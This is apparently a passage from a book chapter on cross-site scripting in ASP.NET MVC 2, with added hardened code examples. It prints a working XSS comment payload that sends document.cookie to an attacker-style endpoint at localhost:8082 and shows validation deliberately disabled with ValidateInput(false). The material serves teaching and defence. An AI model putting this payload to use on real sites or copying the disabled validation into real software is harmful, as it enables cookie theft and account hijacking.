Listing 11.5 Setting an insecure cookie with secret data
public ActionResult Index()
{
    // Stores the secret in a plain cookie; the comment attack that follows
    // reads it back through document.cookie.
    var cookie = new HttpCookie("mvcinaction", "secret");
    Response.SetCookie(cookie);
    return View();
}
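As an added example (not code from the book), here is the same action as listing 11.5 with the two cookie flags that keep its value away from script running in the page. HomeController is an assumed name, since the listing shows only the action; the file needs the System.Web and System.Web.Mvc references of an ASP.NET MVC 2 project.

```csharp
using System.Web;
using System.Web.Mvc;

// Added example: the Index action from listing 11.5, hardened.
// HomeController is an assumed name; the book's listing shows only the action.
public class HomeController : Controller
{
    public ActionResult Index()
    {
        var cookie = new HttpCookie("mvcinaction", "secret")
        {
            // HttpOnly: the browser withholds the cookie from document.cookie,
            // so a script like the one in listing 11.6 cannot read it.
            // This does not remove the XSS; it only limits what the script can steal.
            HttpOnly = true,

            // Secure: the cookie travels only over HTTPS. Assumes the site is
            // served over HTTPS; on plain HTTP the browser would never send it back.
            Secure = true
        };
        Response.SetCookie(cookie);

        // Better still, keep the secret on the server (for example in Session)
        // and let the cookie carry only an opaque identifier.
        return View();
    }
}
```

HttpOnly alone would have stopped the exfiltration shown in figure 11.3, but injected script could still act inside the page on the user's behalf, so output encoding (section 11.2.2) remains the real fix.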
With the cookie created, we can play the part of the hacker on the comments page, as shown in figure 11.1.
Security
Figure 11.1 The comments page
We included a button that will automatically insert a malicious comment in the Comment text area. The comment appears in listing 11.6.
Listing 11.6 A malicious comment
A long comment <script>document.write('<img src=http://localhost:8082/attack/register input=' +escape(document.cookie)+ '/>')</script>
This comment includes a script block that writes HTML to the browser. The HTML contains an image whose SRC attribute doesn't point to an image at all, but the browser doesn't know that. The browser sends a request to the attacking server with the cookie in the query string. After we save the comment, the script is executed on the subsequent page where the comment is displayed, as shown in figure 11.2. We can't see anything strange here, but the nefarious script is in the HTML source, and the relevant section is shown in listing 11.7.
Cross-site scripting (XSS)
Figure 11.2 The comment: unbeknownst to the visitor, a nasty script is executed.
Listing 11.7 Nefarious script in HTML
<p>Comment:</p>
<p>
  A long comment <script>document.write('<img src=http://localhost:8082/attack/register input=' + escape(document.cookie) + '/>')</script>
</p>
Of course, the browser dutifully responds to this script and sends the cookie to the attacking site. When we reload the attacking site, we can see that our attack has been executed, as shown in figure 11.3. The other site received our cookie.
Figure 11.3 Hacking success: the cookie has been sent to the attacking site.
Now that we've had a chance to see XSS in action, let's work on securing our application against that vulnerability.
11.2.2 Avoiding XSS vulnerabilities
Never trust input. Never, ever, ever expect input to be safe. Whether it's from a human user or a machine, dangerous input is the root attack vector involved in XSS attacks. We don't trust it coming in, and we certainly don't trust it when we render it. That's the key.
ENCODE EVERYTHING
One vulnerability in our example application is that it rendered the submitted script as script to be executed by the browser (as shown in figure 11.2). Instead, we should have HTML-encoded the comment. HTML encoding transforms the characters that the browser would interpret as HTML into character entities that the browser renders as literal text without interpreting them. Instead of our script being parsed and executed, it would've simply been displayed as text. In our view, we rendered the comment with this markup: <%= Model.Comment %>, but we could've applied a built-in function that encodes HTML: <%= Html.Encode(Model.Comment) %>. Figure 11.4 shows how a harmless HTML-encoded script would appear.
Figure 11.4 Our script rendered harmlessly.
HTML-encoding code blocks in ASP.NET 4
There's a new feature in ASP.NET 4 that allows developers to conveniently express HTML-encoded output without using the Html.Encode helper function. Instead of specifying output with <%= "text" %>, we can use <%: "text" %>. For more information, refer to Phil Haack's blog post, HTML Encoding Code Blocks with ASP.NET 4 (http://mng.bz/Z3V5). Although HTML encoding all output makes our application much more secure, hackers are crafty and are constantly discovering new ways to evade encoding. It's important to also check input to our application.
ASP.NET MVC DEFAULTS
To craft the vulnerable example, we had to disable protective features in ASP.NET MVC 2. Listing 11.8 demonstrates how input validation was specifically disabled.
Listing 11.8 Disabling input validation
[ValidateInput(false)]
public ViewResult Save(CommentInput form)
{
    return View(form);
}
When set to false, the ValidateInput attribute signals ASP.NET not to validate user input to this action. Without this attribute, validation happens by default, checking the query string, form, and cookies for a list of malicious content. Without this attribute directing ASP.NET not to validate, users submitting unsafe input will see the exception in figure 11.5. Input validation can also reject legitimate input if the application expects HTML or other markup. It should be disabled with extreme caution, and you should redouble your efforts to HTML-encode all output.
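The following is an added example, not the book's code, that brings the two defences of this section together: the Save action with request validation left on (no ValidateInput attribute), and the two ways the view can render the comment, written as plain C# methods so the difference is visible outside a view. CommentsController and CommentRendering are assumed names, and CommentInput is assumed to expose the Comment property the view reads. Html.Encode in MVC 2 calls HttpUtility.HtmlEncode; the helper below uses System.Net.WebUtility.HtmlEncode (.NET 4 and later), which gives the same result for the characters involved here and compiles without a System.Web reference. On .NET 3.5, use HttpUtility.HtmlEncode instead.

```csharp
using System.Net;
using System.Web.Mvc;

// Added example. CommentInput is assumed to carry a single Comment property,
// matching the Model.Comment the chapter's view renders.
public class CommentInput
{
    public string Comment { get; set; }
}

// Assumed controller name. Note what is missing: there is no
// [ValidateInput(false)] on Save, so ASP.NET request validation stays on and a
// posted comment containing markup such as <script> is rejected with an
// HttpRequestValidationException before this action ever runs (figure 11.5).
public class CommentsController : Controller
{
    [HttpPost]
    public ViewResult Save(CommentInput form)
    {
        return View(form);
    }
}

// What the view does with the value, as two ordinary methods.
public static class CommentRendering
{
    // Equivalent of <%= Model.Comment %>: whatever was submitted reaches the
    // browser as markup, which is how listing 11.7 came to contain live script.
    public static string RenderRaw(string comment)
    {
        return "<p>Comment:</p> <p>" + comment + "</p>";
    }

    // Equivalent of <%= Html.Encode(Model.Comment) %>, or <%: Model.Comment %>
    // in ASP.NET 4. Every <, >, &, " and ' in the comment becomes a character
    // entity, so the browser shows the text and interprets none of it.
    public static string RenderEncoded(string comment)
    {
        return "<p>Comment:</p> <p>" + WebUtility.HtmlEncode(comment ?? string.Empty) + "</p>";
    }
}
```

Passing the comment from listing 11.6 through RenderEncoded yields markup in which the angle brackets of <script> and <img> have become &lt; and &gt; and the quotes have become &#39;, which the browser displays as inert text, as in figure 11.4. Keep both layers: request validation catches the obvious cases at the door, and encoding on output protects the page even for the input that had to be let through.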